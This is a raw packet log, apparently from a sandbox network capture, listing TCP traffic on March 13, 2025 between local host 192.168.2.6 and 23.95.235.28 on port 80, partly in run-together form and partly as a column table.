                                                                                    Mar 13, 2025 01:18:55.476310968 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.476715088 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476722002 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476733923 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476739883 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476747990 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476754904 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476761103 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476768017 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476777077 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476777077 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.476783991 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476798058 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.476804018 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.647716999 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.647722960 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.647731066 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.647737026 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.647742987 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.647748947 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.647757053 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.647775888 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.647775888 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.647803068 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.647803068 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648035049 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648171902 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648179054 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648191929 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648324966 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648330927 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648336887 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648343086 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648350954 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648353100 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648355961 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648394108 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648394108 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648452044 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648459911 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648467064 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648473978 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648480892 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648494959 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648497105 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648502111 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648507118 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648513079 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648516893 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648520947 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.648554087 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648555994 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648555994 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.648612022 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.649353981 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649362087 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649374008 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649379969 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649385929 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649393082 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649399996 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649406910 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649414062 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649421930 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649420977 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.649435043 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649442911 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649449110 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649456024 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.649456024 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649462938 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649467945 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.649467945 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.649470091 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.649574995 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.649574995 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.650156975 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650165081 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650177002 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650183916 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650190115 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650238037 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.650238037 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.650304079 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650311947 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650317907 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650335073 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650341034 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650353909 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650369883 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650381088 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650388002 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.650388956 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650401115 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650403023 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650407076 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.650410891 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.650435925 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.650435925 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.651269913 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.651304007 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651310921 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651323080 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651329041 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651334047 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651341915 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651354074 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651360035 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651367903 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651371002 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.651375055 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651381016 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651386976 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651392937 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651398897 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651405096 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651412964 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651427031 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651432991 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.651436090 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.651437044 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.651437044 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.651479959 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.652015924 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.652112007 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.652120113 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.652132034 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.652138948 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.652195930 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.652404070 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.691994905 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.692028046 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.692039967 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.692075968 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.692092896 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.692131042 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.692161083 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.692168951 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.692234993 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.692234993 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.692260027 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.692429066 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.733402014 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733422995 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733429909 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733510017 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733524084 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733532906 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.733532906 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.733680964 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733689070 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733700991 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733731985 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.733792067 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.733792067 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.733793974 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733799934 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733812094 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733819008 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733827114 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.733856916 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.733944893 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734010935 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734018087 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734025002 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734060049 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734067917 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734080076 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734086037 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734086037 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734087944 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734095097 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734127998 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734201908 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734391928 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734399080 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734524012 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734577894 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734586000 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734599113 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734605074 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734611988 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734625101 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734631062 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734637976 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734652042 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734663010 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.734669924 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734669924 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734720945 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.734733105 CET4969480192.168.2.623.95.235.28
                                                                                    Mar 13, 2025 01:18:55.735003948 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.735011101 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.735023975 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.735110044 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.735116959 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.735127926 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.735135078 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.735141039 CET804969423.95.235.28192.168.2.6
                                                                                    Mar 13, 2025 01:18:55.735147953 CET804969423.95.235.28192.168.2.6
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Mar 13, 2025 01:18:55.735153913 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735161066 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735167027 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735168934 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.735168934 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.735177040 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735184908 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.735227108 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.735227108 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.735517025 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.735693932 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735708952 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735719919 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735726118 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735733986 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735744953 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735752106 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735758066 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735764980 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735773087 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.735774040 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.735795975 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.735840082 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.736336946 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736345053 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736357927 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736363888 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736370087 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736375093 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736382008 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736387968 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736399889 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736406088 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736412048 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736418962 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736424923 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736430883 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736437082 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736442089 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736445904 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.736445904 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.736445904 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.736448050 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736460924 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736468077 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.736480951 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.736514091 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.736514091 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.737307072 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737323046 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737327099 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737332106 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737340927 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737349987 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737364054 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737371922 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737379074 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737381935 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.737392902 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737397909 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737404108 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737411022 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737416029 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.737416983 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737423897 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737430096 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737435102 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.737436056 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737443924 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737446070 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.737449884 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.737504959 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.737642050 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.738316059 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738322973 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738334894 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738341093 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738347054 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738359928 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738365889 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738378048 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738384008 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738398075 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738406897 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738414049 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738425970 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738437891 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738440990 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.738440990 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.738440990 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.738441944 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.738440990 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.738440990 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.738511086 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.738511086 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.778796911 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.778821945 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.778832912 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.778882980 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.778883934 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.778920889 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.778928995 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.779015064 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.779021978 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.779033899 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.779097080 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.779268980 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.820398092 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820411921 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820425987 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820499897 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820519924 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820528984 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820532084 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820538998 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820553064 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.820553064 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.820663929 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.820739985 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820750952 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820765972 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820780993 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820795059 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820822954 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.820822954 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.820930958 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.820954084 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821059942 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821068048 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821075916 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821082115 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821084976 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821093082 CET  49694        80         192.168.2.6    23.95.235.28
Mar 13, 2025 01:18:55.821096897 CET  80           49694      23.95.235.28   192.168.2.6
Mar 13, 2025 01:18:55.821105957 CET  49694        80         192.168.2.6    23.95.235.28
